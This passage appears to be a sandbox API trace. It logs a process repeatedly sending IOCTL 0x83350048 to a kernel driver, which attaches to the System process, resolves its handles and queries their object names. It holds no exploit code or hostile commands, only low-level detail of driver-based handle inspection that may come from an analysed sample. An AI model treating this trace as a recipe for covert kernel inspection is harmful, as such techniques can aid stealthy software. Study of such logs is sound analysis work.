KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.639] ObReferenceObjectByHandle (in: Handle=0xffffffff8000074c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a603c20, HandleInformation=0x0) returned 0x0 [0288.639] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.639] PsReleaseProcessExitSynchronization () returned 0x2 [0288.639] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88e [0288.639] ObQueryNameString (in: Object=0xffffe0006a603c20, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.639] ObfDereferenceObject (Object=0xffffe0006a603c20) returned 0x7fff [0288.639] IoCompleteRequest () returned 0x0 [0288.639] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.639] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.639] PsAcquireProcessExitSynchronization () returned 0x0 [0288.639] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.639] ObReferenceObjectByHandle (in: Handle=0xffffffff80000780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069983c50, HandleInformation=0x0) returned 0x0 [0288.639] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.639] PsReleaseProcessExitSynchronization () returned 0x2 [0288.639] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88d [0288.639] ObQueryNameString (in: Object=0xffffe00069983c50, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.639] ObfDereferenceObject (Object=0xffffe00069983c50) returned 0x7ffe [0288.639] IoCompleteRequest () returned 0x0 [0288.639] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.639] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.639] PsAcquireProcessExitSynchronization () returned 0x0 [0288.639] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.639] ObReferenceObjectByHandle (in: Handle=0xffffffff80000784, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069985f20, HandleInformation=0x0) returned 0x0 [0288.639] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.639] PsReleaseProcessExitSynchronization () returned 0x2 [0288.640] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88c [0288.640] ObQueryNameString (in: Object=0xffffe00069985f20, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.640] ObfDereferenceObject (Object=0xffffe00069985f20) returned 0x7ffe [0288.640] IoCompleteRequest () returned 0x0 [0288.640] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2e, lpOverlapped=0x0) returned 1 [0288.640] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.640] PsAcquireProcessExitSynchronization () returned 0x0 [0288.640] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.640] ObReferenceObjectByHandle (in: Handle=0xffffffff8000078c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fb8900, HandleInformation=0x0) returned 0x0 [0288.640] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.640] PsReleaseProcessExitSynchronization () returned 0x2 [0288.640] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88b [0288.640] ObQueryNameString (in: Object=0xffffe00069fb8900, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.640] ObfDereferenceObject (Object=0xffffe00069fb8900) returned 0x7fff [0288.640] IoCompleteRequest () returned 0x0 [0288.640] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0288.640] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.640] PsAcquireProcessExitSynchronization () returned 0x0 [0288.640] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.640] ObReferenceObjectByHandle (in: Handle=0xffffffff8000080c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699e1930, HandleInformation=0x0) returned 0x0 [0288.640] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.640] PsReleaseProcessExitSynchronization () returned 0x2 [0288.640] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88a [0288.640] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.640] ObfDereferenceObject (Object=0xffffe000699e1930) returned 0x7ffc [0288.640] IoCompleteRequest () returned 0x0 [0288.640] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xc4, lpOverlapped=0x0) returned 1 [0288.640] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.640] PsAcquireProcessExitSynchronization () returned 0x0 [0288.640] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.640] ObReferenceObjectByHandle (in: Handle=0xffffffff80000818, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699e4d40, HandleInformation=0x0) returned 0x0 [0288.640] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.640] PsReleaseProcessExitSynchronization () returned 0x2 [0288.640] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f889 [0288.640] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.640] ObfDereferenceObject (Object=0xffffe000699e4d40) returned 0x7fff [0288.640] IoCompleteRequest () returned 0x0 [0288.640] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.640] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.641] PsAcquireProcessExitSynchronization () returned 0x0 [0288.641] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.641] ObReferenceObjectByHandle (in: Handle=0xffffffff80000890, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697c9c60, HandleInformation=0x0) returned 0x0 [0288.641] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.641] PsReleaseProcessExitSynchronization () returned 0x2 [0288.641] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f888 [0288.641] ObQueryNameString (in: Object=0xffffe000697c9c60, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.641] ObfDereferenceObject (Object=0xffffe000697c9c60) returned 0x7fff [0288.641] IoCompleteRequest () returned 0x0 [0288.641] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x22, lpOverlapped=0x0) returned 1 [0288.641] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.641] PsAcquireProcessExitSynchronization () returned 0x0 [0288.641] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.641] ObReferenceObjectByHandle (in: Handle=0xffffffff80000894, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690ba4d0, HandleInformation=0x0) returned 0x0 [0288.641] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.641] PsReleaseProcessExitSynchronization () returned 0x2 [0288.641] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f887 [0288.641] ObQueryNameString (in: Object=0xffffe00068b696a0, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.641] ObfDereferenceObject (Object=0xffffe000690ba4d0) returned 0x7ffd [0288.641] IoCompleteRequest () returned 0x0 [0288.641] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x2e, lpOverlapped=0x0) returned 1 [0288.641] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.641] PsAcquireProcessExitSynchronization () returned 0x0 [0288.641] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.641] ObReferenceObjectByHandle (in: Handle=0xffffffff80000898, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006969ca50, HandleInformation=0x0) returned 0x0 [0288.641] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.641] PsReleaseProcessExitSynchronization () returned 0x2 [0288.641] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f886 [0288.641] ObQueryNameString (in: Object=0xffffe0006969ca50, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.641] ObfDereferenceObject (Object=0xffffe0006969ca50) returned 0x7fff [0288.641] IoCompleteRequest () returned 0x0 [0288.641] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0288.641] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.641] PsAcquireProcessExitSynchronization () returned 0x0 [0288.641] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.641] ObReferenceObjectByHandle (in: Handle=0xffffffff800008b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b50c20, HandleInformation=0x0) returned 0x0 [0288.641] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.641] PsReleaseProcessExitSynchronization () returned 0x2 [0288.641] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f885 [0288.641] ObQueryNameString (in: Object=0xffffe00069b50c20, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.641] ObfDereferenceObject (Object=0xffffe00069b50c20) returned 0x7fff [0288.641] IoCompleteRequest () returned 0x0 [0288.642] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xce, lpOverlapped=0x0) returned 1 [0288.642] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.642] PsAcquireProcessExitSynchronization () returned 0x0 [0288.642] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.642] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b50ea0, HandleInformation=0x0) returned 0x0 [0288.642] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.642] PsReleaseProcessExitSynchronization () returned 0x2 [0288.642] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f884 [0288.642] ObQueryNameString (in: Object=0xffffe00069b50ea0, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.642] ObfDereferenceObject (Object=0xffffe00069b50ea0) returned 0x7fff [0288.642] IoCompleteRequest () returned 0x0 [0288.642] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0288.642] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.642] PsAcquireProcessExitSynchronization () returned 0x0 [0288.642] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.642] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b50a10, HandleInformation=0x0) returned 0x0 [0288.642] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.642] PsReleaseProcessExitSynchronization () returned 0x2 [0288.642] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f883 [0288.642] ObQueryNameString (in: Object=0xffffe00069b50a10, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.642] ObfDereferenceObject (Object=0xffffe00069b50a10) returned 0x7fff [0288.642] IoCompleteRequest () returned 0x0 [0288.642] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0288.642] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.642] PsAcquireProcessExitSynchronization () returned 0x0 [0288.642] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.642] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698ed3d0, HandleInformation=0x0) returned 0x0 [0288.642] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.642] PsReleaseProcessExitSynchronization () returned 0x2 [0288.642] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f882 [0288.642] ObQueryNameString (in: Object=0xffffe000698ed3d0, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.642] ObfDereferenceObject (Object=0xffffe000698ed3d0) returned 0x7fff [0288.642] IoCompleteRequest () returned 0x0 [0288.642] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0288.642] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.642] PsAcquireProcessExitSynchronization () returned 0x0 [0288.642] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.643] ObReferenceObjectByHandle (in: Handle=0xffffffff800008cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b8dbe0, HandleInformation=0x0) returned 0x0 [0288.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.643] PsReleaseProcessExitSynchronization () returned 0x2 [0288.643] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f881 [0288.643] ObQueryNameString (in: Object=0xffffe00069b8dbe0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.643] ObfDereferenceObject (Object=0xffffe00069b8dbe0) returned 0x7fff [0288.643] IoCompleteRequest () returned 0x0 [0288.643] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8e, lpOverlapped=0x0) returned 1 [0288.643] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.643] PsAcquireProcessExitSynchronization () returned 0x0 [0288.643] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.643] ObReferenceObjectByHandle (in: Handle=0xffffffff800008d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ba6cd0, HandleInformation=0x0) returned 0x0 [0288.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.643] PsReleaseProcessExitSynchronization () returned 0x2 [0288.643] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f880 [0288.643] ObQueryNameString (in: Object=0xffffe00069ba6cd0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.643] ObfDereferenceObject (Object=0xffffe00069ba6cd0) returned 0x800e [0288.643] IoCompleteRequest () returned 0x0 [0288.643] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x74, lpOverlapped=0x0) returned 1 [0288.643] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.643] PsAcquireProcessExitSynchronization () returned 0x0 [0288.643] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.643] ObReferenceObjectByHandle (in: Handle=0xffffffff800008dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b9c090, HandleInformation=0x0) returned 0x0 [0288.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.643] PsReleaseProcessExitSynchronization () returned 0x2 [0288.643] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87f [0288.643] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.643] ObfDereferenceObject (Object=0xffffe00069b9c090) returned 0x7ed1 [0288.643] IoCompleteRequest () returned 0x0 [0288.643] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.643] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.643] PsAcquireProcessExitSynchronization () returned 0x0 [0288.643] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.643] ObReferenceObjectByHandle (in: Handle=0xffffffff800008e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b9d760, HandleInformation=0x0) returned 0x0 [0288.643] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.643] PsReleaseProcessExitSynchronization () returned 0x2 [0288.643] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87e [0288.643] ObQueryNameString (in: Object=0xffffe00069b9d760, ObjectNameInfo=0xffffe00069121044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069121044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.643] ObfDereferenceObject (Object=0xffffe00069b9d760) returned 0x7ff7 [0288.643] IoCompleteRequest () returned 0x0 [0288.644] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.644] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.644] PsAcquireProcessExitSynchronization () returned 0x0 [0288.644] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.644] ObReferenceObjectByHandle (in: Handle=0xffffffff800008e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b9e910, HandleInformation=0x0) returned 0x0 [0288.644] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.644] PsReleaseProcessExitSynchronization () returned 0x2 [0288.644] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f87d [0288.644] ObQueryNameString (in: Object=0xffffe00069b9e910, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.644] ObfDereferenceObject (Object=0xffffe00069b9e910) returned 0x7ffd [0288.644] IoCompleteRequest () returned 0x0 [0288.644] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, 